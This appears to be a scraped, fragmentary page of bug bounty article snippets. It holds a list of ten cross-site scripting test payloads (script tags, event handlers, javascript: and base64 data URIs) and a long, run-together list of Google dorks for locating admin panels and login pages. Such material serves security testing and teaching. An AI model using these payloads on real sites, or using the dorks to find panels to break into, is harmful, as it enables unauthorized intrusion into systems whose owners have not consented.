Cross-Site Scripting (XSS) | Bug Bounty
What Is Cross-Site Scripting(XSS)? Cross-Site Scripting (XSS) is a type of security vulnerability that enables an attacker to inject malicious code into a website or web application. The attacker's code…
What Is Cross-Site Scripting(XSS)? Cross-Site Scripting (XSS) is a type of security vulnerability that enables an attacker to inject malicious code into a website or web application. The attacker's code…
1. <script>alert('XSS')</script> 2. <img src="javascript:alert('XSS');"> 3. <svg/onload=alert('XSS')> 4. <body onload=alert('XSS')> 5. <img src=x onerror=alert('XSS')> 6. <input type="text" value="``onmouseover=alert('XSS')"> 7. <a onmouseover="alert('XSS')">link</a> 8. <div style="xg-p:expression(alert('XSS'))"> 9. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4="> 10. <iframe src="javascript:alert('XSS');">…
"Programmers need to show why the bug is significant, and the organization needs to give input to the programmer — in case it's not significant or substantial, why that is.…
Google Dorks To Find Admin Panels inurl:index.php/logininurl:login.phpadministrator.php"inurl:admin/addaccount.php""inurl:admin/addpage.php""inrul:admin/admin_area.php""inrul:admin/addstory.php""inurl:admin/login.php""inurl:admin/passwordreset.php""inurl:admin/signup.php""inurl:admin/register.php""inurl:admin/adduser.php""inurl:admin/admin.php""inurl:admin/admin_details.php"inurl:admin/account.phpinurl:server.phpinurl:admin.inurl:admin/cp.phpinurl:admin/upload.phpsite:example.com inurl:manager/uvpanelinurl:wp-admin.phpinurl:wp-login.phpinurl:relogin.htminurl:admin1.htmlinurl:admin2.htmlinurl:admin3.htmlinurl:admin1.phpinurl:admin2.phpinurl:admin3.phpsite:example.com inurl:controlpanelinurl:fileadmininurl:servermaninurl:sysadmsuperuserletmeinaccessinurl:admin/controlpanel.php/member/myadmin/admins/pgadmin/sysadmin/showlogin/xlogin/acct_login/login-usbigadmin/phppgadmin/project-admins/sql-admin/radmind/newsadmin/sshadmin/macadmin/admin4_account/admin1_account/admin2_account/admin3_account/cadmins/power-user/instadmininurl:admin/login.aspinurl:admin/account.aspinurl:admin/adduser.aspinurl:adminpanels.asp